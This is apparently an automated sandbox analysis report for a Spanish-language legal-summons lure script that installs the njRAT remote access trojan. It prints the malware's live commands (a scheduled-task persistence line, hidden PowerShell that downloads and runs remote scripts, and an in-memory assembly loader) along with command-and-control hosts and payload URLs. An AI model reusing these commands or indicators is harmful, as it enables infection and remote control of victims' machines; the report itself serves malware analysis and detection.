Analysis
-
max time kernel
300s -
max time network
302s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27/09/2022, 06:42
Static task
static1
Behavioral task
behavioral1
Sample
Denuncia en su contra y detalles de la citacion.wsf
Resource
win7-20220812-en
General
-
Target
Denuncia en su contra y detalles de la citacion.wsf
-
Size
171KB
-
MD5
abba9bfa9425c66df09fe00a63876ece
-
SHA1
3c2e055f21cdb118619497f70e4a6882265c7ef8
-
SHA256
c738d9ae6eec6bb34b54cf66de709a61c6c7d22d98d8762fdf6b5b5b9c48021b
-
SHA512
31bfa060814416d73b0fd5de00c09491b4386bea8a036c248b27de04f96f17de2068538d627dca756bad52f6347d1ce4b5106a01d7e1cdbff3569d3e4f63ce3f
-
SSDEEP
48:oyRZ4meLOL8GELn2HH+ukgSHoUFIgEciIZJ9GFnFqFTF8RZFnFDwF4FuFMFZF/yu:oi4meawMkg0LFIguSJERt+UZ6K8y
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Extracted
njrat
0.7NC
NYAN CAT
hv2022.dyndns.ws:2225
b00ac376fe85426b91
-
reg_key
b00ac376fe85426b91
-
splitter
@!#&^%$
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1232 1864 schtasks.exe 79 -
Blocklisted process makes network request 4 IoCs
flow pid Process 35 4156 powershell.exe 37 4156 powershell.exe 38 3012 powershell.exe 40 3012 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3012 set thread context of 4112 3012 powershell.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1232 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4156 powershell.exe 4156 powershell.exe 3012 powershell.exe 3012 powershell.exe 1964 powershell.exe 1964 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4156 wrote to memory of 3656 4156 powershell.exe 91 PID 4156 wrote to memory of 3656 4156 powershell.exe 91 PID 3656 wrote to memory of 3012 3656 WScript.exe 92 PID 3656 wrote to memory of 3012 3656 WScript.exe 92 PID 3012 wrote to memory of 1964 3012 powershell.exe 94 PID 3012 wrote to memory of 1964 3012 powershell.exe 94 PID 3012 wrote to memory of 4112 3012 powershell.exe 96 PID 3012 wrote to memory of 4112 3012 powershell.exe 96 PID 3012 wrote to memory of 4112 3012 powershell.exe 96 PID 3012 wrote to memory of 4112 3012 powershell.exe 96 PID 3012 wrote to memory of 4112 3012 powershell.exe 96 PID 3012 wrote to memory of 4112 3012 powershell.exe 96 PID 3012 wrote to memory of 4112 3012 powershell.exe 96 PID 3012 wrote to memory of 4112 3012 powershell.exe 96
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Denuncia en su contra y detalles de la citacion.wsf"1⤵PID:1188
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 5 /tn "OneDrive Reporting Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'https://notificacionesdelafiscalia.com/t52ph4t' -o C:\Windows\Temp\t.vbs;start-sleep 5;start-Process C:\Windows\Temp\t.vbs" /F1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1232
-
C:\Windows\system32\WindowsPowershell\v1.0\powershell.exeC:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -Windowstyle Hidden $a = wget "https://notificacionesdelafiscalia.com/t52ph4t" -o C:\Windows\Temp\t.vbs;start-sleep 5;start-Process C:\Windows\Temp\t.vbs1⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\t.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('b41c42003d6a-78c9-52d4-d8d1-25d8b8f0=nekot&aidem=tla?txt.sndnyd.2202vhF2%5222/o/moc.topsppa.3785b-ceyorp-wen/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4112
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD533e9dd1bc41e70c4fbdf04b85cf36ff4
SHA10433625fae735abc2f11249456e212dfca1473a9
SHA256f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9
SHA512d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df
-
Filesize
1KB
MD5af1cb166ef60425f7f761c7e2a56271c
SHA13d24a690ddbe7f2c099aa54198b1af5a0a0fa429
SHA256b5f5944d0252a0dad2c96e9f46799557f59855169cb1693dc40f1fdfd524bb4f
SHA51239f8eea604c85b92b98775fd85db519941c7a4c5cc2f1ae4228048a3f1963765d813e79b6ea354a329ad0c220dd1c7d68898affbfcad5d47a5d4a95de86217ce
-
Filesize
577KB
MD561f778fb90f57dd17579f8fcbb81599b
SHA18c894032d3f7ea36c7fd9f44d999f8e25385fe93
SHA2565b7bf75498ebda8816ccb651e41b39b12ac087682f826a597caa717cc18afdbd
SHA51258062880faf4e85f51166bbd6d738181b2188ebba104c275dc2423bc6f120f1818cd572b6a2d549ee3126cef3afb5ae276c1c137c65e1cd988105fb10f4cc09c